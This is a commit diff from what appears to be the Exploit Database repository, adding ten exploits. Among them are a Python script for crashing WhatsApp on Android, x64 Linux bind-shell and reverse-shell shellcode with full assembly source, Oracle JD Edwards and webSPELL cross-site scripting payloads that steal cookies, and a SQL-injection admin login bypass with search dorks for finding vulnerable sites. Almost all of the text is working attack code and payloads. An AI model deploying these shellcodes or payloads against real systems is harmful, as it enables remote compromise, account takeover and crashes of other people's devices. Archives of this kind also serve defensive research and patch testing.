Update: 2014-12-29

10 new exploits
This commit is contained in:
Offensive Security 2014-12-29 10:19:37 +00:00
parent c329fa003a
commit fa9aebca13
11 changed files with 1034 additions and 207 deletions

424
files.csv

File diff suppressed because it is too large Load diff

104
platforms/android/remote/35637.py Executable file
View file

@ -0,0 +1,104 @@
#!/usr/bin/python
#-*- coding: utf-8 -*
# Title: WhatsApp Remote Reboot/Crash App Android
# Product: WhatsApp
# Vendor Homepage: http://www.whatsapp.com
# Vulnerable Version(s): 2.11.476
# Tested on: WhatsApp v2.11.476 on MotoG 2014 -Android 4.4.4
# Date: 26/12/2014
# #RemoteExecution - www.remoteexecution.net
#
# Author Exploit:
# Daniel Godoy @0xhielasangre <danielgodoy@gobiernofederal.com>
# Credits:
# Gonza Cabrera
#
# Reference: http://foro.remoteexecution.net/index.php/topic,569.0.html
#
# Custom message with non-printable characters will crash any WhatsApp client < v2.11.476 for android.
# It uses Yowsup library, that provides us with the options of registration, reading/sending messages, and even
# engaging in an interactive conversation over WhatsApp protocol
#
import argparse, sys, os, csv
from Yowsup.Common.utilities import Utilities
from Yowsup.Common.debugger import Debugger
from Yowsup.Common.constants import Constants
from Examples.CmdClient import WhatsappCmdClient
from Examples.EchoClient import WhatsappEchoClient
from Examples.ListenerClient import WhatsappListenerClient
from Yowsup.Registration.v1.coderequest import WACodeRequest
from Yowsup.Registration.v1.regrequest import WARegRequest
from Yowsup.Registration.v1.existsrequest import WAExistsRequest
from Yowsup.Registration.v2.existsrequest import WAExistsRequest as WAExistsRequestV2
from Yowsup.Registration.v2.coderequest import WACodeRequest as WACodeRequestV2
from Yowsup.Registration.v2.regrequest import WARegRequest as WARegRequestV2
from Yowsup.Contacts.contacts import WAContactsSyncRequest
import threading,time, base64
DEFAULT_CONFIG = os.path.expanduser("~")+"/.yowsup/auth"
COUNTRIES_CSV = "countries.csv"
DEFAULT_CONFIG = os.path.expanduser("~")+"/.yowsup/auth"
######## Yowsup Configuration file #####################
# Your configuration should contain info about your login credentials to Whatsapp. This typically consist of 3 fields:\n
# phone: Your full phone number including country code, without '+' or '00'
# id: This field is used in registration calls (-r|-R|-e), and for login if you are trying to use an existing account that is setup
# on a physical device. Whatsapp has recently deprecated using IMEI/MAC to generate the account's password in updated versions
# of their clients. Use --v1 switch to try it anyway. Typically this field should contain the phone's IMEI if your account is setup on
# a Nokia or an Android device, or the phone's WLAN's MAC Address for iOS devices. If you are not trying to use existing credentials
# or want to register, you can leave this field blank or set it to some random text.
# password: Password to use for login. You obtain this password when you register using Yowsup.
######################################################
MINE_CONFIG ="config"
def getCredentials(config = DEFAULT_CONFIG):
if os.path.isfile(config):
f = open(config)
phone = ""
idx = ""
pw = ""
cc = ""
try:
for l in f:
line = l.strip()
if len(line) and line[0] not in ('#',';'):
prep = line.split('#', 1)[0].split(';', 1)[0].split('=', 1)
varname = prep[0].strip()
val = prep[1].strip()
if varname == "phone":
phone = val
elif varname == "id":
idx = val
elif varname =="password":
pw =val
elif varname == "cc":
cc = val
return (cc, phone, idx, pw);
except:
pass
return 0
def main(phone):
credentials = getCredentials(MINE_CONFIG or DEFAULT_CONFIG )
if credentials:
countryCode, login, identity, password = credentials
identity = Utilities.processIdentity(identity)
password = base64.b64decode(password)
# Custom message that will crash WhatsApp
message = message = "#RemoteExecution?

View file

@ -0,0 +1,248 @@
/*
* Author: Sean Dillon
* Copyright: (c) 2014 CAaNES, LLC. (http://caanes.com)
* Release Date: December 19, 2014
*
* Description: x64 Linux null-free TCP bind port shellcode, optional 4 byte password
* Assembled Size: 81 bytes, 96 with password
* Tested On: Kali 1.0.9a GNU/Linux 3.14.5-kali1-amd64 x86_64
* License: http://opensource.org/license/MIT
*
* Build/Run: gcc -m64 -z execstack -fno-stack-protector bindshell.c -o bindshell.out
* ./bindshell.out &
* nc localhost 4444
*/
/*
* NOTE: This C code binds on port 4444 and does not have the password option enabled.
* The end of this file contains the .nasm source code and instructions for building from that.
*/
#include <stdio.h>
#include <string.h>
unsigned char shellcode[] =
"\x31\xf6" /* xor %esi,%esi */
"\xf7\xe6" /* mul %esi */
"\xff\xc6" /* inc %esi */
"\x6a\x02" /* pushq $0x2 */
"\x5f" /* pop %rdi */
"\x04\x29" /* add $0x29,%al */
"\x0f\x05" /* syscall */
"\x50" /* push %rax */
"\x5f" /* pop %rdi */
"\x52" /* push %rdx */
"\x52" /* push %rdx */
"\xc6\x04\x24\x02" /* movb $0x2,(%rsp) */
"\x66\xc7\x44\x24\x02\x11\x5c" /* movw $0x5c11,0x2(%rsp) */
"\x54" /* push %rsp */
"\x5e" /* pop %rsi */
"\x52" /* push %rdx */
"\x6a\x10" /* pushq $0x10 */
"\x5a" /* pop %rdx */
"\x6a\x31" /* pushq $0x31 */
"\x58" /* pop %rax */
"\x0f\x05" /* syscall */
"\x5e" /* pop %rsi */
"\xb0\x32" /* mov $0x32,%al */
"\x0f\x05" /* syscall */
"\xb0\x2b" /* mov $0x2b,%al */
"\x0f\x05" /* syscall */
"\x50" /* push %rax */
"\x5f" /* pop %rdi */
"\x6a\x03" /* pushq $0x3 */
"\x5e" /* pop %rsi */
"\xff\xce" /* dec %esi */
"\xb0\x21" /* mov $0x21,%al */
"\x0f\x05" /* syscall */
"\x75\xf8" /* jne 35 <dupe_loop> */
"\x56" /* push %rsi */
"\x5a" /* pop %rdx */
"\x56" /* push %rsi */
"\x48\xbf\x2f\x2f\x62\x69\x6e" /* movabs $0x68732f6e69622f2f,%rdi */
"\x2f\x73\x68" /* . */
"\x57" /* push %rdi */
"\x54" /* push %rsp */
"\x5f" /* pop %rdi */
"\xb0\x3b" /* mov $0x3b,%al */
"\x0f\x05" /* syscall */;
main(void)
{
printf("Shellcode length: %d\n", (int)strlen(shellcode));
/* pollute registers and call shellcode */
__asm__ ( "mov $0xffffffffffffffff, %rax\n\t"
"mov %rax, %rbx\n\t"
"mov %rax, %rcx\n\t"
"mov %rax, %rdx\n\t"
"mov %rax, %rsi\n\t"
"mov %rax, %rdi\n\t"
"mov %rax, %rbp\n\t"
"call shellcode" );
}
/* --------------------------------------------------------------------------------------
; Author: Sean Dillon
; Company: CAaNES, LLC. (http://caanes.com)
; Release Date: December 19, 2014
;
; Description: x64 Linux null-free bind TCP port shellcode, optional 4 byte password
; Assembled Size: 81 bytes, 96 with password
; Tested On: Kali 1.0.9a GNU/Linux 3.14.5-kali1-amd64 x86_64
; License: http://opensource.org/license/MIT
;
; Build/Run: nasm -f elf64 -o bindshell.o bindshell.nasm
; ld -o bindshell bindshell.o
; objdump -d --disassembler-options=addr64 bindshell
BITS 64
global _start
section .text
; settings
%define USEPASSWORD ; comment this to not require password
PASSWORD equ 'Z~r0' ; cmp dword (SEGFAULT on fail; no bruteforce/cracking/etc.)
PORT equ 0x5c11 ; default 4444
; syscall kernel opcodes
SYS_SOCKET equ 0x29
SYS_BIND equ 0x31
SYS_LISTEN equ 0x32
SYS_ACCEPT equ 0x2b
SYS_DUP2 equ 0x21
SYS_EXECVE equ 0x3b
; argument constants
AF_INET equ 0x2
SOCK_STREAM equ 0x1
_start:
; High level psuedo-C overview of shellcode logic:
;
; sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_IP)
; struct sockaddr = {AF_INET; [PORT; 0x0; 0x0]}
;
; bind(sockfd, &sockaddr, 16)
; listen(sockfd, 0)
; client = accept(sockfd, &sockaddr, 16)
;
; read(client, *pwbuf, 16) // 16 > 4
; if (pwbuf != PASSWORD) goto drop
;
; dup2(client, STDIN+STDOUT+STDERR)
; execve("/bin/sh", NULL, NULL)
create_sock:
; sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_IP)
xor esi, esi ; 0 out rsi
mul esi ; 0 out rax, rdx
; rdx = IPPROTO_IP (int: 0)
inc esi ; rsi = SOCK_STREAM (int: 1)
push AF_INET ; rdi = AF_INET (int: 2)
pop rdi
add al, SYS_SOCKET
syscall
; store sock
push rax
pop rdi ; rdi = sockfd
struct_sockaddr:
; struct sockaddr = {AF_INET; PORT; 0x0; 0x0}
push rdx ; 0 out the stack for struct
push rdx
mov byte [rsp], AF_INET ; sockaddr.sa_family = AF_INET (u_char)
mov word [rsp + 0x2], PORT ; sockaddr.sa_data[] = PORT (short)
push rsp
pop rsi ; rsi = &sockaddr
bind_port:
; bind(sockfd, const struct sockaddr *addr, 16)
push rdx ; save 0 for rsi in SYS_LISTEN
push 0x10 ; rdx = 16 (sizeof sockaddr)
pop rdx
push SYS_BIND
pop rax
syscall
server_listen:
; listen(sockfd, 0)
pop rsi ; backlog = 0 (int)
mov al, SYS_LISTEN
syscall
client_accept:
; client = accept(sockfd, struct sockaddr *addr, 16)
mov al, SYS_ACCEPT
syscall
; store client
push rax
pop rdi ; rdi = client
; no need to close parent, save bytes
%ifdef USEPASSWORD
password_check:
; password = read(client, *buf, 4)
push rsp
pop rsi ; rsi = &buf (char*)
; rdx = 0x10, >4 bytes
xor eax, eax ; SYS_READ = 0x0
syscall
cmp dword [rsp], PASSWORD ; simple comparison
jne drop ; bad pw, abort
%endif
dupe_sockets:
; dup2(client, STDIN)
; dup2(client, STDOUT)
; dup2(client, STERR)
push 0x3 ; loop down file descriptors for I/O
pop rsi
dupe_loop:
dec esi
mov al, SYS_DUP2
syscall
jne dupe_loop
exec_shell:
; execve('//bin/sh', NULL, NULL)
push rsi ; *argv[] = 0
pop rdx ; *envp[] = 0
push rsi ; '\0'
mov rdi, '//bin/sh' ; str
push rdi
push rsp
pop rdi ; rdi = &str (char*)
mov al, SYS_EXECVE ; we fork with this syscall
syscall
drop:
; password check failed, crash program with BADINSTR/SEGFAULT
;--------------------------------------------------------------------------------------*/

View file

@ -0,0 +1,246 @@
/*
* Author: Sean Dillon
* Copyright: (c) 2014 CAaNES, LLC. (http://caanes.com)
* Release Date: December 19, 2014
*
* Description: x64 Linux null-free reverse TCP shellcode, optional 4 byte password
* Assembled Size: 77 - 85 bytes, 90 - 98 with password
* Tested On: Kali 1.0.9a GNU/Linux 3.14.5-kali1-amd64 x86_64
* License: http://opensource.org/license/MIT
*
* Build/Run: gcc -m64 -z execstack -fno-stack-protector reverseshell.c -o reverseshell.out
* nc -l -p 4444
*/
/*
* NOTE: This C code connects to 127.0.0.1:4444 and does not have the password option enabled.
* Because the IP 127.0.0.1 contains null-bytes, a mask has to be used, adding 8 bytes.
* The end of this file contains the .nasm source code and instructions for building from that.
*/
#include <stdio.h>
#include <string.h>
char shellcode[] =
"\x31\xf6" /* xor %esi,%esi */
"\xf7\xe6" /* mul %esi */
"\xff\xc6" /* inc %esi */
"\x6a\x02" /* pushq $0x2 */
"\x5f" /* pop %rdi */
"\x04\x29" /* add $0x29,%al */
"\x0f\x05" /* syscall */
"\x50" /* push %rax */
"\x5f" /* pop %rdi */
"\x52" /* push %rdx */
"\x52" /* push %rdx */
"\xc7\x44\x24\x04\x7d\xff\xfe" /* movl $0xfefeff7d,0x4(%rsp) */
"\xfe" /* . */
"\x81\x44\x24\x04\x02\x01\x01" /* addl $0x2010102,0x4(%rsp) */
"\x02" /* . */
"\x66\xc7\x44\x24\x02\x11\x5c" /* movw $0x5c11,0x2(%rsp) */
"\xc6\x04\x24\x02" /* movb $0x2,(%rsp) */
"\x54" /* push %rsp */
"\x5e" /* pop %rsi */
"\x6a\x10" /* pushq $0x10 */
"\x5a" /* pop %rdx */
"\x6a\x2a" /* pushq $0x2a */
"\x58" /* pop %rax */
"\x0f\x05" /* syscall */
"\x6a\x03" /* pushq $0x3 */
"\x5e" /* pop %rsi */
"\xff\xce" /* dec %esi */
"\xb0\x21" /* mov $0x21,%al */
"\x0f\x05" /* syscall */
"\x75\xf8" /* jne 39 <dupe_loop> */
"\x56" /* push %rsi */
"\x5a" /* pop %rdx */
"\x56" /* push %rsi */
"\x48\xbf\x2f\x2f\x62\x69\x6e" /* movabs $0x68732f6e69622f2f,%rdi */
"\x2f\x73\x68" /* . */
"\x57" /* push %rdi */
"\x54" /* push %rsp */
"\x5f" /* pop %rdi */
"\xb0\x3b" /* mov $0x3b,%al */
"\x0f\x05" /* syscall */;
main(void)
{
printf("Shellcode length: %d\n", (int)strlen(shellcode));
/* pollute registers and call shellcode */
__asm__ ( "mov $0xffffffffffffffff, %rax\n\t"
"mov %rax, %rbx\n\t"
"mov %rax, %rcx\n\t"
"mov %rax, %rdx\n\t"
"mov %rax, %rsi\n\t"
"mov %rax, %rdi\n\t"
"mov %rax, %rbp\n\t"
"call shellcode" );
}
/* --------------------------------------------------------------------------------------
; Author: Sean Dillon
; Company: CAaNES, LLC. (http://caanes.com)
; Release Date: December 19, 2014
;
; Description: x64 Linux null-free reverse TCP shellcode, optional 4 byte password
; Assembled Size: 77 - 85 bytes, 90 - 98 with password
; Tested On: Kali 1.0.9a GNU/Linux 3.14.5-kali1-amd64 x86_64
; License: http://opensource.org/license/MIT
;
; Build/Run: nasm -f elf64 -o reverseshell.o reverseshell.nasm
; ld -o reverseshell reverseshell.o
; objdump -d --disassembler-options=addr64 reverseshell
BITS 64
global _start
section .text
; settings
%define USEPASSWORD ; comment this to not require password
PASSWORD equ 'Z~r0' ; cmp dword (SEGFAULT on fail; no bruteforce/cracking/etc.)
IP equ 0x0100007f ; default 127.0.0.1, contains nulls so will need mask
PORT equ 0x5c11 ; default 4444
; change the null-free mask as needed
%define NULLFREE_MASK 0x02010102 ; comment this out if no .0. in IP, save 8 bytes
%ifdef NULLFREE_MASK
%define NULLFREE_IP IP - NULLFREE_MASK
%else
%define NULLFREE_IP IP
%endif
; syscall kernel opcodes
SYS_SOCKET equ 0x29
SYS_CONNECT equ 0x2a
SYS_DUP2 equ 0x21
SYS_EXECVE equ 0x3b
; argument constants
AF_INET equ 0x2
SOCK_STREAM equ 0x1
_start:
; High level psuedo-C overview of shellcode logic:
;
; sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_IP)
; IP = NULLFREE_IP + NULLFREE_MASK
; struct sockaddr = {AF_INET; [PORT; IP; 0x0]}
;
; connect(sockfd, &sockaddr, 16)
;
; read(sockfd, *pwbuf, 16) // 16 > 4
; if (pwbuf != PASSWORD) goto drop
;
; dup2(sockfd, STDIN+STDOUT+STDERR)
; execve("/bin/sh", NULL, NULL)
create_sock:
; sockfd = socket(AF_INET, SOCK_STREAM, 0)
; AF_INET = 2
; SOCK_STREAM = 1
; syscall number 41
xor esi, esi ; 0 out rsi
mul esi ; 0 out rax, rdx
; rdx = IPPROTO_IP (int: 0)
inc esi ; rsi = SOCK_STREAM (int: 1)
push AF_INET ; rdi = AF_INET (int: 2)
pop rdi
add al, SYS_SOCKET
syscall
; copy socket descriptor to rdi for future use
push rax
pop rdi
struct_sockaddr:
; server.sin_family = AF_INET
; server.sin_port = htons(PORT)
; server.sin_addr.s_addr = inet_addr("127.0.0.1")
; bzero(&server.sin_zero, 8)
push rdx
push rdx
mov dword [rsp + 0x4], NULLFREE_IP
%ifdef NULLFREE_MASK
add dword [rsp + 0x4], NULLFREE_MASK
%endif
mov word [rsp + 0x2], PORT
mov byte [rsp], AF_INET
connect_sock:
; connect(sockfd, (struct sockaddr *)&server, sockaddr_len)
push rsp
pop rsi
push 0x10
pop rdx
push SYS_CONNECT
pop rax
syscall
%ifdef USEPASSWORD
password_check:
; password = read(sockfd, *buf, 4)
; rsi = &buf (char*)
; rdx = 0x10, >4 bytes
xor eax, eax ; SYS_READ = 0x0
syscall
cmp dword [rsp], PASSWORD ; simple comparison
jne drop ; bad pw, abort
%endif
dupe_sockets:
; dup2(sockfd, STDIN)
; dup2(sockfd, STDOUT)
; dup2(sockfd, STERR)
push 0x3 ; loop down file descriptors for I/O
pop rsi
dupe_loop:
dec esi
mov al, SYS_DUP2
syscall
jne dupe_loop
exec_shell:
; execve('//bin/sh', NULL, NULL)
push rsi ; *argv[] = 0
pop rdx ; *envp[] = 0
push rsi ; '\0'
mov rdi, '//bin/sh' ; str
push rdi
push rsp
pop rdi ; rdi = &str (char*)
mov al, SYS_EXECVE ; we fork with this syscall
syscall
drop:
; password check failed, crash program with BADINSTR/SEGFAULT
;--------------------------------------------------------------------------------------*/

View file

@ -0,0 +1,28 @@
source: http://www.securityfocus.com/bid/47479/info
Oracle JD Edwards EnterpriseOne is prone to multiple cross-site scripting vulnerabilities.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
This vulnerability affects the following supported versions:
8.9 GA through 8.98.4.1 and OneWorld Tools through 24.1.3
http://XXX.XXX.XXX.XXX/jde/E1Menu.maf
Parameter: jdeowpBackButtonProtect
* The GET request has been set to: >'"><script>alert(20639)</script>
/jde/E1Menu.maf?selectJPD812=*ALL&envRadioGroup=&jdeowpBackButtonProtect=PROTECTED&%3E%27%22%3E%3Cscript%3Ealert%2820639%29%3C%2Fscript%3E=123 HTTP/1.0
Cookie: e1AppState=0:|; advancedState=none; JSESSIONID=00002ZzkuqI4ibppzAAcyOOuBnh:14p7umbnp; e1MenuState=100003759|
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: XXX.XXX.XXX.XXX

View file

@ -0,0 +1,39 @@
source: http://www.securityfocus.com/bid/47479/info
Oracle JD Edwards EnterpriseOne is prone to multiple cross-site scripting vulnerabilities.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
This vulnerability affects the following supported versions:
8.9 GA through 8.98.4.1 and OneWorld Tools through 24.1.3
http://XXX.XXX.XXX.XXX/jde/E1Menu_Menu.mafService
Parameter: e1.namespace
* The POST request has been set to: %2Balert%2835890%29%2B
/jde/E1Menu_Menu.mafService?e1.mode=view&e1.state=maximized&RENDER_MAFLET=E1Menu&e1.service=E1Menu_Menu&e1.namespace=%2Balert%2835890%29%2B HTTP/1.0
Cookie: e1AppState=0:|; advancedState=none; JSESSIONID=0000b7KChC3OjQct7TOz9U6NMhK:14p7umbnp; e1MenuState=100003759|
Content-Length: 12
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: XXX.XXX.XXX.XXX
Content-Type: application/x-www-form-urlencoded
Referer: http://XXX.XXX.XXX.XXX/jde/E1Menu.maf?selectJPD812=*ALL&envRadioGroup=&jdeowpBackButtonProtect=PROTECTED
nodeId=&a=lc

View file

@ -0,0 +1,33 @@
source: http://www.securityfocus.com/bid/47479/info
Oracle JD Edwards EnterpriseOne is prone to multiple cross-site scripting vulnerabilities.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
This vulnerability affects the following supported versions:
8.9 GA through 8.98.4.1 and OneWorld Tools through 24.1.3
http://XXX.XXX.XXX.XXX/jde/E1Menu_OCL.mafService
Parameter: e1.namespace
* The GET request has been set to: %2Balert%2848981%29%2B
/jde/E1Menu_OCL.mafService?e1.mode=view&e1.state=maximized&RENDER_MAFLET=E1Menu&e1.service=E1Menu_OCL&e1.namespace=%2Balert%2848981%29%2B&timestamp=1290796450377
HTTP/1.0
Cookie: e1AppState=0:|; advancedState=none; JSESSIONID=0000xXDQLJurffGMVi6Du_UnL0Z:14p7umbnp; e1MenuState=100003759|
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: XXX.XXX.XXX.XXX
Referer: http://XXX.XXX.XXX.XXX/jde/E1Menu.maf?selectJPD812=*ALL&envRadioGroup=&jdeowpBackButtonProtect=PROTECTED

View file

@ -0,0 +1,32 @@
source: http://www.securityfocus.com/bid/47479/info
Oracle JD Edwards EnterpriseOne is prone to multiple cross-site scripting vulnerabilities.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
This vulnerability affects the following supported versions:
8.9 GA through 8.98.4.1 and OneWorld Tools through 24.1.3
http://XXX.XXX.XXX.XXX/jde/MafletClose.mafService
Parameter: RENDER_MAFLET
* The GET request has been set to: E1Menu"%2Balert%2844218%29%2B"
/jde/MafletClose.mafService?e1.mode=view&e1.state=maximized&RENDER_MAFLET=E1Menu"%2Balert%2844218%29%2B"&e1.service=MafletClose&e1.namespace= HTTP/1.0
Cookie: e1AppState=0:|; advancedState=none; JSESSIONID=0000FGUGWkc2Y9q-dO3GqshuPVQ:14p7umbnp; e1MenuState=100003759|
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: XXX.XXX.XXX.XXX
Referer: http://XXX.XXX.XXX.XXX/jde/E1Menu.maf?selectJPD812=*ALL&envRadioGroup=&jdeowpBackButtonProtect=PROTECTED

View file

@ -0,0 +1,33 @@
source: http://www.securityfocus.com/bid/47479/info
Oracle JD Edwards EnterpriseOne is prone to multiple cross-site scripting vulnerabilities.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
This vulnerability affects the following supported versions:
8.9 GA through 8.98.4.1 and OneWorld Tools through 24.1.3
* http://XXX.XXX.XXX.XXX/jde/JASMafletMafBrowserClose.mafService
Parameter: jdemafjasLinkTarget
* The GET request has been set to: E1MENUMAIN_3860308878877903872"%2Balert%28222735%29%2B"
/jde/JASMafletMafBrowserClose.mafService?jdemafjasFrom=BrowserClose&e1.mode=view&jdeLoginAction=LOGOUT&e1.state=maximized&jdemafjasLinkTarget=E1MENUMAIN_3860308878877903872"%2Balert%28222735%29%2B"&RENDER_MAFLET=E1Menu&jdemafjasLauncher=PSFT_TE_V3_SW&e1.service=JASMafletMafBrowserClose&e1.namespace=
HTTP/1.0
Cookie: e1AppState=0:|; advancedState=none; JSESSIONID=00003wyVho0_-Ma0fQp67cuqdCs:14p7ulc8o; e1MenuState=100003759|
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: XXX.XXX.XXX.XXX
Referer: http://XXX.XXX.XXX.XXX/jde/E1Menu.maf?selectJPD812=*ALL&envRadioGroup=&jdeowpBackButtonProtect=PROTECTED

40
platforms/php/webapps/35492.txt Executable file
View file

@ -0,0 +1,40 @@
# Exploit Title: Free Article Submissions SQL Injection Vulnerability
# Google Dork: inurl:/category.php?id=22 "Affiliate Programs Portal"
inurl:/category.php?id=2 "Arts & Entertainment"
# Date: 07/12/2014
# Exploit Author: BarrabravaZ
# Vendor Homepage: http://www.articlesetup.com/
# Software Link: [download link if available]
# Version: 1.00
# Tested on: Windows
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
«««:»»» Author will be not responsible for any damage. «««:»»»
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
x
x Issue:
x SQL Injection Bypass Login
x
x Risk level: High
x ~ The remote attacker has the possibility to manage the website.
x ~ The remote attacker is able to login into website with access level as admin.
x
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
##
## Proof Of Concept:
## http://127.0.0.1/admin/login.php
##
## Username : ' OR 1=1 #
## Password : barrabravaz
##
##
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Special thanks to:
[+] Chae Cryptn [+] Slackerc0de Family [+] SBH Pentester [+] Pocong XXX
[+] Madleets [+] Xplorecrew [+] Hackernewbie [+] Yogyacarderlink
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

14
platforms/php/webapps/35643.txt Executable file
View file

@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/47500/info
webSPELL is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
webSPELL 4.2.2a is affected; other versions may also be vulnerable.
http://www.example.com/index.php?site=newsletter&pass=1%22%3E%3Cimg%20src=1.png%20onerror=alert%28document.cookie%29%3E
http://www.example.com/index.php?site=messenger&action=touser&touser=1%22%3E%3Cimg%20src=1.png%20onerror=alert%28document.cookie%29%3E
http://www.example.com/admin/admincenter.php?site=users&action=addtoclan&id=1&page=1%22%3E%3Cimg%20src=1.png%20onerror=alert%28document.cookie%29%3E
http://www.example.com/admin/admincenter.php?site=squads&action=edit&squadID=1%22%3E%3Cimg%20src=1.png%20onerror=alert%28document.cookie%29%3E
http://www.example.com/admin/admincenter.php?site=contact&action=edit&contactID=1%22%3E%3Cimg%20src=1.png%20onerror=alert%28document.cookie%29%3E